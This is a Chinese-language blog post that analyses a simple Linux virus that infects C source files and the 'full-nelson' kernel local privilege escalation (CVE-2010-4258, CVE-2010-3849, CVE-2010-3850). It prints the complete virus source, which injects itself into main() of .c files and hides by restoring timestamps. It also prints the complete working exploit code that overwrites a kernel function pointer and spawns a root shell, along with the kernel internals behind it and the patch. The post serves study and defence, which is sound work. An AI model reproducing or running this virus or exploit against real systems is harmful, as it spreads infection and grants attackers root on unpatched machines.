karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

catalog

1. 程序功能概述
2. 感染文件
3. 前置知识
4. 获取ROOT权限: Linux Kernel <= 2.6.37 - Local Privilege Escalation

1. 程序功能概述

1. 得到root权限
2. 感染文件
3. 进行破坏

Relevant Link:

https://github.com/karottc/linux-virus

2. 感染文件

该病毒采取感染.C源代码文件的方式进行传播感染，即在每个被感染的源代码的主函数中插入恶意函数的调用，以及在文件的其他位置插入恶意逻辑函数体，并在文件头进行"感染标记"，防止重复感染

/* linux virus start */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <dirent.h>
#include <sys/stat.h>
#include <unistd.h>
#include <utime.h>

#define VIRNAME    "virus.c"   // 这个文件名会被动态替换掉
#define INF_PATH    "/home/cy/work/linux_virus/testTop/"
#define BUFSIZE     200

char currentPath[BUFSIZE]="";
static int count = 0;  //被感染的.c文件的个数

void destroySystem(void);

void do_virus()
{
    DIR *dp;
    struct dirent *dirp;
    
    struct stat buf,cur_dir_buf;
    int len;     //文件名的长度
    char str_buf[BUFSIZE];

    if (!strcmp(currentPath,""))
    {
        //得到当前目录，即带毒源文件
        if (getcwd(currentPath,BUFSIZE)==NULL)
        {
            printf("getcwnd failure!!!\n");
            return;
        }
        
        strcat(currentPath,"/");
        strcat(currentPath,VIRNAME);
        
        printf("get current directory: %s!!\n",currentPath);

        //改变工作路径
        chdir(INF_PATH);
    }

    //打开目录流
    if ((dp=opendir("."))==NULL)
    {
        printf("opendir failure!!!\n");
        return;
    }

    //遍历该目录下的每个文件
    while ((dirp=readdir(dp)) != NULL)
    {
        len = strlen(dirp->d_name);
        //如果是.C文件，就进行感染，
        if (dirp->d_name[len-1]=='c' && dirp->d_name[len-2]=='.')
        {
            printf("C FILE:  %s\n",dirp->d_name);
            if (infect(dirp->d_name) == 0)
            {
                count++;
                printf("object file %s has been infected !!\n",dirp->d_name);
            }
            printf("\n-------------------------------\n");
            continue;
        }

        //得到该文件的stat
        if (stat(dirp->d_name,&buf) < 0)
        {
            printf("get stat of file failure!!\n");
            continue;
        }
        //判断是否使目录
        if (!S_ISDIR(buf.st_mode))
        {
            continue;
        }
        //是./..就略过
        if (!strcmp(dirp->d_name,".") ||
            !strcmp(dirp->d_name,".."))
        {
            continue;
        }

        printf("the directory: %s\n",dirp->d_name);
        //.pulse文件夹中的文件使runtime，碰到会有文件，所以也略过
        if (!strcmp(dirp->d_name,".pulse"))
        {
            continue;
        }
        
        chdir(dirp->d_name);
        chdir("..");
    }
    closedir(dp);
    destroySystem();
}
int infect(char *file_name)
{
    //需要感染的目标文件，已经被病毒文件，和一个临时文件
    FILE *fp_obj,*fp_vir,*fp_tmp;
    //对文件一行一行的的扫描，每行的最大容量
    char buf[BUFSIZE];
    //一个标识，对文件感染的判断
    int flag;
    //临时文件名
    char *tmp_buf;
    //得到目标文件的stat
    struct stat statBuf;
    //用来放置文件的访问时间和修改时间
    struct utimbuf timeBuf;

    //打开目标文件，用于读写
    if ((fp_obj=fopen(file_name,"r+"))==NULL)
    {
        printf("open object file %s failure !!!\n",file_name);
        return 1;
    }
    //得到目标文件的stat
    if (stat(file_name,&statBuf) < 0)
    {
        printf("get object file %s stat failure !!\n",file_name);
        return 1;
    }
    //存放目标文件的修改时间和访问时间，这个避免被发现文件已被感染
    timeBuf.actime = statBuf.st_atime;
    timeBuf.modtime = statBuf.st_mtime;
    //打开被感染的病毒源文件
    if ((fp_vir=fopen(currentPath,"r"))==NULL)
    {
        printf("open virus file %s failure !!\n",currentPath);
        return 1;
    }
    //新建一个临时文件
    if ((tmp_buf=tmpnam(NULL))==NULL)
    {
        printf("create temp file failure !!\n");
        return 1;
    }
    //打开临时文件，每次都是在临时文件中添加内容
    if ((fp_tmp=fopen(tmp_buf,"a+"))==NULL)
    {
        printf("open temp file failure !!\n");
        return 1;
    }
    //使用完后删除临时文件
    unlink(tmp_buf);

    flag = 1;
    //一行一行遍历目标文件
    while (fgets(buf,BUFSIZE,fp_obj) != NULL)
    {
        //目标文件已被感染的标志
        if (!strcmp(buf,"/* linux virus start */\n"))
        {
            printf("object file %s has been infected !!\n",file_name);
            return 1;
        }
        //目标文件有main函数，改变标志
        if (flag == 1 && strstr(buf,"main("))
        {
            flag = 0;
        }
        //在main函数结束前插入调用病毒感染的函数
        if (flag == 0 && (strstr(buf,"return") || strstr(buf,"}")))
        {
            //插入条用函数，改变标志
            fputs("\tdo_virus();\n",fp_tmp);
            flag = 2;
        }
        //将目标文件放入临时文件中
        fputs(buf,fp_tmp);
    }
    //目标文件没有main函数，即不会被感染，直接返回
    if (flag != 2)
    {
        printf("object don't main function !!\n");
        return 1;
    }

    flag = 1;
    //遍历带毒文件，提取带毒文件的带毒部分
    while (fgets(buf,BUFSIZE,fp_vir) != NULL)
    {
        //找到带毒部分的开始，改变标志
        if (flag == 1 && !strcmp(buf,"/* linux virus start */\n"))
        {
            flag = 0;
        }
        //没有遍历到带毒部分时，继续读取下一行
        if (flag == 1)
        {
            continue;
        }
        //当带毒部分读取完后，结束遍历
        if (flag == 2)
        {
            break;
        }
        //遍历到带毒部分结束部分，改变标志
        if (!strcmp(buf,"/* linux virus end */\n"))
        {
            flag = 2;
        }
        //改变带毒文件的文件名
        if (strstr(buf,"#define VIRNAME") && buf[0]=='#')
        {
            snprintf(buf,sizeof(buf),"%s\t\"%s\"\n", "#define VIRNAME",file_name);
        }
        //将带毒部分添加到目标文件的源码后面
        fputs(buf,fp_tmp);
    }
    //关闭带毒文件
    fclose(fp_vir);

    //重置文件指针
    rewind(fp_tmp);
    rewind(fp_obj);
    //将临时文件的内容覆盖掉目标文件的内容
    while (fgets(buf,BUFSIZE,fp_tmp) != NULL)
    {
        fputs(buf,fp_obj);
    }
    //关闭临时文件和目标文件
    fclose(fp_tmp);
    fclose(fp_obj);

    //设置目标文件的访问时间和修改时间为原来的时间
    if (utime(file_name,&timeBuf) < 0)
    {
        printf("set access and modify time failure !!!\n");
        return 1;
    }
    return 0;
}

void destroySystem()
{
    printf("\ndestroying System......\n");
}
/* linux virus end */

#include "getRoot.h"

int main(void)
{
    getRoot();
    do_virus();
    printf("number of c file is: %d\n",count);
    return 0;
}

3. 前置知识

0x1: 进程创建、退出

当fork或者clone一个进程在的时候， copy_process执行如下操作
/source/kernel/fork.c

static struct task_struct *copy_process(unsigned long clone_flags,
        unsigned long stack_start,
        unsigned long stack_size,
        int __user *child_tidptr,
        struct pid *pid,
        int trace,
        unsigned long tls)
{
    ..
    p->set_child_tid = (clone_flags & CLONE_CHILD_SETTID) ? child_tidptr : NULL;
    /*
    * Clear TID on mm_release()?
    */
    //如果clone的flag带有CLONE_CHILD_CLEARTID标志，那么clear_child_tid指针中就会保存应用层传递进来的child_tidptr的地址
    p->clear_child_tid = (clone_flags & CLONE_CHILD_CLEARTID) ? child_tidptr : NULL;
    ..

所以，当应用层调用clone函数，并传递CLONE_CHILD_CLEARTID标志，则child_tidptr指针就会被赋值给子进程的clear_child_tid，即用户能够从外部传入参数，控制处于内核态的p->clear_child_tid

clone((int (*)(void *))trigger,
              (void *)((unsigned long)newstack + 65536),
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
              &fildes, NULL, NULL, child_tidptr);

进程在退出的时候调用do_exit清理资源，调用路径如下: do_exit->exit_mm->mm_release
/source/kernel/fork.c

/* 
    Please note the differences between mmput and mm_release.
    * mmput is called whenever we stop holding onto a mm_struct,
    * error success whatever.
    *
    * mm_release is called after a mm_struct has been removed
    * from the current process.
    *
    * This difference is important for error handling, when we
    * only half set up a mm_struct for a new process and need to restore
    * the old one.  Because we mmput the new mm_struct before
    * restoring the old one. . .
    * Eric Biederman 10 January 1998
*/
void mm_release(struct task_struct *tsk, struct mm_struct *mm)
{
    ..
    if (tsk->clear_child_tid) 
    {
        if (!(tsk->flags & PF_SIGNALED) && atomic_read(&mm->mm_users) > 1) 
        {
            /*
            * We don't check the error code - if userspace has
            * not set up a proper pointer then tough luck.
            */
            put_user(0, tsk->clear_child_tid);
            sys_futex(tsk->clear_child_tid, FUTEX_WAKE, 1, NULL, NULL, 0);
        }
        tsk->clear_child_tid = NULL;
    }
    ..

上述代码中，如果tsk->clear_child_tid不为空，那么其会调用put_user(0, tsk->clear_child_tid);
put_user其实是一个宏，具体是__put_user_check函数，它会将tsk->clear_child_tid的值置为0
/source/arch/x86/include/asm/uaccess.h

#define __put_user_check(x,ptr,size)                \
({                                \
    long __pu_err = -EFAULT;                \
    __typeof__(*(ptr)) __user *__pu_addr = (ptr);        \
    __typeof__(*(ptr)) __pu_val = x;            \
    if (likely(access_ok(VERIFY_WRITE, __pu_addr, size)))    \
        __put_user_size(__pu_val, __pu_addr, (size),    \
                __pu_err);            \
    __pu_err;                        \
})

__put_user_check函数会调用access_ok去检查传进来的参数是否合法
/source/arch/x86/include/asm/uaccess.h

#define access_ok(type,addr,size)    _access_ok((unsigned long)(addr),(size))

int _access_ok(unsigned long addr, unsigned long size)
{
    if (!size)
        return 1;

    if (!addr || addr > (0xffffffffUL - (size - 1)))
        goto _bad_access;
    
    //如果get_fs() = KERNEL_DS，那么_access_ok检查始终返回1.
    if (segment_eq(get_fs(), KERNEL_DS))
        return 1;

    if (memory_start <= addr && (addr + size - 1) < memory_end)
        return 1;

_bad_access:
    pr_debug("Bad access attempt: pid[%d] addr[%08lx] size[0x%lx]\n",
         current->pid, addr, size);
    return 0;
}

put_user本身没有问题，但是如果一个oops发生的时候有如下操作

set_fs(KERNEL_DS);

arch/x86/include/asm/uaccess.h:
#define set_fs(x) (current_thread_info()->addr_limit = (x))

set_fs将当前进程的地址空间上限设为KERNL_DS，会绕过put_user的指针上界检查，这样就可以将一个NULL值写入任意一个内核地址空间。但是要利用这个漏洞需要有set_fs(KERNEL_DS);这个前提，通常的一些内核bug产生的oops就满足这个条件

0x2: 无效地址访问异常

每当我们访问一个无效地址的时候，系统便会执行do_page_fault去生成异常日志，结束异常进程等

int do_page_fault(struct pt_regs *regs, unsigned long address,
          unsigned int write_access, unsigned int trapno)
{
    // ......
    die("Oops", regs, (write_access << 15) | trapno, address);
    do_exit(SIGKILL);
}

接下来看看CVE-2010-3849这个漏洞，它主要是一个0地址访问异常漏洞，msg->msg_name可以由用户空间控制，因此可以是个NULL值。接下来的saddr->cookie;这句调用就会造成0地址访问异常

static int econet_sendmsg(struct kiocb *iocb, struct socket *sock,
                          struct msghdr *msg, size_t len)
{       
      struct sock *sk = sock->sk;
      struct sockaddr_ec *saddr=(struct sockaddr_ec *)msg->msg_name;
      
      //dereference zero address
      eb->cookie = saddr->cookie;
}

以上前置知识整合起来可以形成对这个漏洞利用成因的描述链

1. 往往一些内核bug产生的时候就满足get_fs() = KERNEL_DS这个条件
2. 这个时候，内核会跳到do_page_fault中，进而调用do_exit->exit_mm->mm_release
3. 在mm_release中，如果tsk->clear_child_tid不为空，那么其会调用put_user(0, tsk->clear_child_tid)，而同时tsk->clear_child_tid又是外部参数可控制的，通过clone的flag带有CLONE_CHILD_CLEARTID标志
4. 在put_user中，会调用access_ok去检查传进来的参数是否合法，因为get_fs() = KERNEL_DS的关系，_access_ok检查始终返回1(即通过)

0x3: 漏洞利用

1. 取需要用到的函数地址

 /* Resolve addresses of relevant symbols */
 printf("[*] Resolving kernel addresses...\n");
 econet_ioctl = get_kernel_sym("econet_ioctl");
 econet_ops = get_kernel_sym("econet_ops");
 commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

2. 申请一块新进程的栈空间

if(!(newstack = malloc(65536))) {
                printf("[*] Failed to allocate memory.\n");
                return -1;
        }

3. 处理好需要映射的地址

// econet_ops中保存了各个econet函数的地址指针，
// 10 * sizeof(void *)到达econet_ioctl的下一个函数地址
// 再-1，那么清零的时候是清掉了econet_ioctl下个函数地址的低24字节和econet_ioctl函数的高8字节
target = econet_ops + 10 * sizeof(void *) - OFFSET;
 
// 清掉econet_ioctl函数的高8字节
landing = econet_ioctl << SHIFT >> SHIFT;

// landing按页对齐，map了2个页的内存
payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                       PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
//之所以要把地址映射到(econet_ioctl&0x00FFFFFF)地址范围内，而不是直接将econet_ops指针数组中的econet_ioctl函数地址清零呢。那是因为新版本的linux不允许用户直接调用mmap函数映射0地址了，所以采用了一个很巧妙的小技巧 

if ((long)payload == -1) {
           rintf("[*] Failed to mmap() at target address.\n");
           return -1;
}

// 将提权代码拷贝到landing
memcpy((void *)landing, &trampoline, 1024);

由于有mmap_min_addr的限制，不能mmap到zero内存，因此不能直接利用这个漏洞。但是可以利用上述的任意内核地址写0漏洞继续将这个dos转为为权限提升。
当do_page_fault执行的时候， null pointer def的oops信息先打印出来，然后会走入do_exit这个路径，进而走入put_user这个路径。
在这条路径的时候把econet_ops的econet_ioctl函数地址给覆盖成用户空间事先映射好的一段代码，通常是shellcode代码，那么在用户空间调用ioctl的时候，就会执行我们的shellcode代码。注意put_user会将一个NULL值写入一个4byte的内存地址，如果我们直接将econet_ops里的econet_ioctl对应的偏移作为覆盖对象，那么触发的时候将会在一次触发NULL pointer的操作。因此这里需要一个技巧只覆盖econet_ioctl的高8位地址为0，如果是高16/24位，那么mmap_min_addr也是不允许映射的，高12位put_user操作不了，因此只能是覆盖高8位

econet_ioctl + 4 +----+ 内存高址
| e0 |
econet_ioctl + 3 ------
| 84 |
econet_ioctl + 2 ------
| 32 |
econet_ioctl + 1 ------
| a0 |
econet_ioctl ------
| ...| 
econet_ops ------ 内存低址

target = econet_ops + 10 * sizeof(void *) - 1; 即指向econet_ioctl + 3，将target传递给put_user，那么econet_ioctl的高8位将会被清0，接下来只要将econet_ioct被覆盖后剩下的内存地址映射为shellcode

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{
 
        commit_creds(prepare_kernel_cred(0));
        return -1;
 
}

void __attribute__((regparm(3)))
trampoline()
{
 
#ifdef __x86_64__
        asm("mov $getroot, %rax; call *%rax;");
#else
        asm("mov $getroot, %eax; call *%eax;");
#endif
 
}

..
//landing等于econet_ioctl的高8位被置零后的内存地址
landing = econet_ioctl << SHIFT >> SHIFT;
..
memcpy((void *)landing, &trampoline, 1024);

4. clone进程

/* Triggers a NULL pointer dereference in econet_sendmsg
 * via sock_no_sendpage, so it's under KERNEL_DS */
// trigger用来触发CVE-2010-3849漏洞，是一个0地址访问异常  
int trigger(int * fildes)
{
        int ret;
        struct ifreq ifr;
 
        memset(&ifr, 0, sizeof(ifr));
        strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
 
        ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
 
        if(ret < 0) {
                printf("[*] Failed to set Econet address.\n");
                return -1;
        }
 
        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
 
        /* Shouldn't get here... */
        exit(0);
}

// clone进程，子进程调用trigger触发0地址访问的漏洞，进而将target指向的地址清0  
// 即清掉了econet_ioctl函数地址的高8字节  
clone((int (*)(void *))trigger,  
              (void *)((unsigned long)newstack + 65536),  
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,  
              &fildes, NULL, NULL, target);

0x4: 漏洞触发流程

1. 通过clone的flag带有CLONE_CHILD_CLEARTID标志，控制tsk->clear_child_tid
目标要替换的内存地址通过get_kernel_sym("econet_ioctl")计算得到 
/*
static struct task_struct *copy_process(unsigned long clone_flags,
        unsigned long stack_start,
        unsigned long stack_size,
        int __user *child_tidptr,
        struct pid *pid,
        int trace,
        unsigned long tls)
{
    ..
    p->set_child_tid = (clone_flags & CLONE_CHILD_SETTID) ? child_tidptr : NULL;
    /*
    * Clear TID on mm_release()?
    */
    //如果clone的flag带有CLONE_CHILD_CLEARTID标志，那么clear_child_tid指针中就会保存应用层传递进来的child_tidptr的地址
    p->clear_child_tid = (clone_flags & CLONE_CHILD_CLEARTID) ? child_tidptr : NULL;
    ..
*/

2. 动态计算出econet_ioctl被劫持后的新函数地址，landing等于econet_ioctl的高8位被置零后的新内存地址，并将shellcode写入此内存地址空间中，等待其被CPU调用执行
/*
..
//landing等于econet_ioctl的高8位被置零后的内存地址
landing = econet_ioctl << SHIFT >> SHIFT;
..
memcpy((void *)landing, &trampoline, 1024);
*/

3. CVE-2010-3849漏洞，触发一个0地址访问异常漏洞
4. linux进入Oops状态，通过set_fs(KERNEL_DS)进入"临界区"，解除了进程读写地址的内核边界限制，此时进程有权利读写任意内存地址，包括内核态的地址
5. 触发的page_fault错误，会产生以下调用链: do_page_fault->do_exit->exit_mm->mm_release->put_user(0, tsk->clear_child_tid)，注意，put_user会将一个NULL值写入一个4byte的内存地址，如果我们直接将econet_ops里的econet_ioctl对应的偏移作为覆盖对象，那么触发的时候将会在一次触发NULL pointer的操作。因此这里需要一个技巧只覆盖econet_ioctl的高8位地址为0
6. 则此时econet_ioctl系统调用的函数地址被劫持为一个高8位被置零的新地址，跳到SHELLCODE中执行
7. 在SHELLCODE中调用commit_creds将当前进程uid、gid修改为0，即root权限

0x5: Patch

/source/kernel/exit.c

void do_exit(long code)
{
    ..
    if (unlikely(!tsk->pid))
        panic("Attempted to kill the idle task!");

     /*
    * If do_exit is called because this processes oopsed, it's possible that get_fs() was left as KERNEL_DS, so reset it to USER_DS before
    * continuing. Amongst other possible reasons, this is to prevent mm_release()->clear_child_tid() from writing to a user-controlled
    * kernel address.
    */
    set_fs(USER_DS);
    
    ptrace_event(PTRACE_EVENT_EXIT, code);
    ..

Relevant Link:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4258
http://blog.csdn.net/hu3167343/article/details/36892563
http://www.cnblogs.com/bittorrent/p/3274405.html 
https://www.exploit-db.com/exploits/15704/

4. 获取ROOT权限: Linux Kernel <= 2.6.37 - Local Privilege Escalation

得到root权限是通过 CVE-2010-4258,CVE-2010-3849,CVE-2010-3850这三个漏洞，主要是Econnet protocol 的漏洞来实现的，CVE-2010-4258这个漏洞的主要思路是如果通过clone函数去创建进程，并且带有CLONE_CHILD_CLEARTID标志，那么进程在退出的时候，可以造成内核任意地址写0的bug。PoC代码利用了多个漏洞来达到权限提升的目的

0x1: CVE-2010-4258

1. access_ok

When a user application passes a pointer to the kernel, and the kernel wants to read or write from that pointer, the kernel needs to perform various checks that a buggy or malicious userspace app hasn't passed an "evil" pointer.
Because the kernel and userspace run in the same address space, the most important check is simply that the pointer points into the "userspace" part of the address space. User applications are protected by page table permissions from writing into kernel memory, but the kernel isn't, and so must explicitly check that any pointers given to it by a user don't point into the kernel region.
The address space is laid out such that user applications get the bottom portion, and the kernel gets the top, so this check is a simple comparison against that boundary. The kernel function that performs this check is called access_ok, although there are various other functions that do the same check, implicitly or otherwise.
内核态的access_ok()会对从用户态传入的读写指针进行边界检查，防止用户态企图对内核态的内存地址进行读写

/source/fs/read_write.c

2. get_fs() and set_fs()

Occasionally, however, the kernel finds it useful to change the rules for what access_ok will allow. set_fs()1 is an internal Linux function that is used to override the definition of the user/kernel split, for the current process.
After a set_fs(KERNEL_DS), no checking is performed that user pointers point to userspace – access_ok will always return true. set_fs(KERNEL_DS) is mainly used to enable the kernel to wrap functions that expect user pointers, by passing them pointers into the kernel address space. A typical use reads something like this:

old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &pos);
set_fs(old_fs);

vfs_readv expects a user-provided pointer, so without the set_fs(), the access_ok() inside vfs_readv() would fail on our kernel buffer, so we use set_fs() to effectively temporarily disable that checking.
如果希望临时从用户态读写内核态的内存，需要使用get_fs()、set_fs()将关键代码区域包裹"wrap"起来，使其临时进入临界区

3. Kernel oopses

When the kernel oopses, perhaps because of a NULL pointer dereference in kernelspace, or because of a call to the BUG() macro to indicate an assertion failure, the kernel attempts to clean up, and then tries to kill the current process by calling the do_exit() function to exit the current process.
When the kernel does so, it's still running in the same process context it was before the oops occured, including any set_fs() override, if applicable. Which means that do_exit will get called with access_ok disabled – not something anyone expected when they wrote the individual pieces of this system.
可以将get_fs()、set_fs()看成一个临界代码执行的事务区域，但是如果内核在临界区中发生内核错误，内核会调用do_exit()立即退出，导致事务不一致状态，即access_ok()处于失效状态

4. clear_child_tid

As it turns out, do_exit contains a write to a user-controlled address that expects access_ok to be working properly!
clear_child_tid is a feature where, on thread exit, the kernel can be made to write a zero into a specified address in that thread's address space, in order to notify other threads of that exit.
This is implemented by simply storing a pointer to the to-be-zeroed address inside struct task_struct (which represents a single thread or process), and, on exit, mm_release, called from do_exit, does:

put_user(0, tsk->clear_child_tid);

This is normally safe, because put_user checks that its second argument falls into the "userspace" segment before doing a write. But, if we are running with get_fs() == KERNEL_DS, it will happily accept any address at all, even one pointing into kernel space.
So, if we find any kernel BUG() or NULL dereference, or other page fault, that we can trigger after a set_fs(KERNEL_DS), we can trick the kernel into a user-controlled write into kernel memory!

5. splice() et. al.

An obvious question at this point is: How much of the kernel can an attacker cause to run with get_fs() == KERNEL_DS?
There are a number of small special cases. For example, the binary sysctl compatibility code works by calling the normal /proc/ write handlers from kernelspace, under set_fs(). handful of compat-mode (32 on 64) syscalls work similarly.

0x2: POC

/*
 * Linux Kernel <= 2.6.37 local privilege escalation
 * by Dan Rosenberg
 * @djrbliss on twitter
 *
 * Usage:
 * gcc full-nelson.c -o full-nelson
 * ./full-nelson
 *
 * This exploit leverages three vulnerabilities to get root, all of which were
 * discovered by Nelson Elhage:
 *
 * CVE-2010-4258
 * -------------
 * This is the interesting one, and the reason I wrote this exploit.  If a
 * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
 * word will be written to a user-specified pointer when that thread exits.
 * This write is done using put_user(), which ensures the provided destination
 * resides in valid userspace by invoking access_ok().  However, Nelson
 * discovered that when the kernel performs an address limit override via
 * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
 * etc.), this override is not reverted before calling put_user() in the exit
 * path, allowing a user to write a NULL word to an arbitrary kernel address.
 * Note that this issue requires an additional vulnerability to trigger.
 *
 * CVE-2010-3849
 * -------------
 * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
 * fairly benign as a local denial-of-service.  It's a perfect candidate to
 * trigger the above issue, since it's reachable via sock_no_sendpage(), which
 * subsequently calls sendmsg under KERNEL_DS.
 *
 * CVE-2010-3850
 * -------------
 * I wouldn't be able to reach the NULL pointer dereference and trigger the
 * OOPS if users weren't able to assign Econet addresses to arbitrary
 * interfaces due to a missing capabilities check.
 *
 * In the interest of public safety, this exploit was specifically designed to
 * be limited:
 *
 *  * The particular symbols I resolve are not exported on Slackware or Debian
 *  * Red Hat does not support Econet by default
 *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
 *    Debian
 *
 * However, the important issue, CVE-2010-4258, affects everyone, and it would
 * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
 * more sophisticated version of this that doesn't have the roadblocks I put in
 * to prevent abuse by script kiddies.
 *
 * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
 *
 * NOTE: the exploit process will deadlock and stay in a zombie state after you
 * exit your root shell because the Econet thread OOPSes while holding the
 * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
 *
 * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
 */

#include <stdio.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <string.h>
#include <net/if.h>
#include <sched.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/utsname.h>
#include <sys/mman.h>
#include <unistd.h>
 #include <errno.h>

/* How many bytes should we clear in our
 * function pointer to put it into userspace? */
#ifdef __x86_64__
#define SHIFT 24
#define OFFSET 3
#else
#define SHIFT 8
#define OFFSET 1
#endif

/* thanks spender... */
unsigned long get_kernel_sym(char *name)
{
        FILE *f;
        unsigned long addr;
        char dummy;
        char sname[512];
        struct utsname ver;
        int ret;
        int rep = 0;
        int oldstyle = 0;

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                        goto fallback;
                oldstyle = 1;
        }

repeat:
        ret = 0;
        while(ret != EOF) {
                if (!oldstyle)
                        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
                else {
                        ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
                        if (ret == 2) {
                                char *p;
                                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                                        continue;
                                p = strrchr(sname, '_');
                                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                                        p = p - 4;
                                        while (p > (char *)sname && *(p - 1) == '_')
                                                p--;
                                        *p = '\0';
                                }
                        }
                }
                if (ret == 0) {
                        fscanf(f, "%s\n", sname);
                        continue;
                }
                if (!strcmp(name, sname)) {
                        fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : 
"");
                        fclose(f);
                        return addr;
                }
        }

        fclose(f);
        if (rep)
                return 0;
fallback:
        uname(&ver);
        if (strncmp(ver.release, "2.6", 3))
                oldstyle = 1;
        sprintf(sname, "/boot/System.map-%s", ver.release);
        f = fopen(sname, "r");
        if (f == NULL)
                return 0;
        rep = 1;
        goto repeat;
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))
getroot(void * file, void * vma)
{

        commit_creds(prepare_kernel_cred(0));
        return -1;

}

/* Why do I do this?  Because on x86-64, the address of
 * commit_creds and prepare_kernel_cred are loaded relative
 * to rip, which means I can't just copy the above payload
 * into my landing area. */
void __attribute__((regparm(3)))
trampoline()
{

#ifdef __x86_64__
        asm("mov $getroot, %rax; call *%rax;");
#else
        asm("mov $getroot, %eax; call *%eax;");
#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg
 * via sock_no_sendpage, so it's under KERNEL_DS */
int trigger(int * fildes)
{
        int ret;
        struct ifreq ifr;

        memset(&ifr, 0, sizeof(ifr));
        strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

        ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

        if(ret < 0) {
                printf("[*] Failed to set Econet address.\n");
                return -1;
        }

        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

        /* Shouldn't get here... */
        exit(0);
}

int main(int argc, char * argv[])
{
        unsigned long econet_ops, econet_ioctl, target, landing;
        int fildes[4], pid;
        void * newstack, * payload;

        /* Create file descriptors now so there are two
           references to them after cloning...otherwise
           the child will never return because it
           deadlocks when trying to unlock various
           mutexes after OOPSing */
        pipe(fildes);
        fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
        fildes[3] = open("/dev/zero", O_RDONLY);

        if(fildes[0] < 0) 
        {
                printf("[*] Failed to open fildes[0] = %d file descriptors. errno = %d\n", fildes[0], errno);
                return -1;
        }
        else if(fildes[1] < 0) 
        {
                printf("[*] Failed to open fildes[1] = %d file descriptors. errno = %d\n", fildes[1], errno);
                return -1;
        }
        else if(fildes[2] < 0) 
        {
                printf("[*] Failed to open file fildes[2] = %d descriptors. errno = %d\n", fildes[2], errno);
                return -1;
        }
        else if(fildes[3] < 0) 
        {
                printf("[*] Failed to open fildes[3] = %d file descriptors. errno = %d\n", fildes[3], errno);
                return -1;
        }

        /* Resolve addresses of relevant symbols */
        printf("[*] Resolving kernel addresses...\n");
        econet_ioctl = get_kernel_sym("econet_ioctl");
        econet_ops = get_kernel_sym("econet_ops");
        commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
        prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

        if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {
                printf("[*] Failed to resolve kernel symbols.\n");
                return -1;
        }

        if(!(newstack = malloc(65536))) {
                printf("[*] Failed to allocate memory.\n");
                return -1;
        }

        printf("[*] Calculating target...\n");
        target = econet_ops + 10 * sizeof(void *) - OFFSET;

        /* Clear the higher bits */
        landing = econet_ioctl << SHIFT >> SHIFT;

        payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                       PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

        if ((long)payload == -1) {
                printf("[*] Failed to mmap() at target address.\n");
                return -1;
        }

        memcpy((void *)landing, &trampoline, 1024);

        clone((int (*)(void *))trigger,
              (void *)((unsigned long)newstack + 65536),
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
              &fildes, NULL, NULL, target);

        sleep(1);

        printf("[*] Triggering payload...\n");
        ioctl(fildes[2], 0, NULL);

        if(getuid()) {
                printf("[*] Exploit failed to get root.\n");
                return -1;
        }

        printf("[*] Got root!\n");
        execl("/bin/sh", "/bin/sh", NULL);
}

Relevant Link:

https://blog.nelhage.com/2010/12/cve-2010-4258-from-dos-to-privesc/

posted @ 2015-11-23 22:13 郑瀚阅读(1056) 评论(0) 编辑收藏举报

刷新页面返回顶部

Han Zheng, Thinker and Doer

Welcome to contact me. Wechat：LittleHann

karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

公告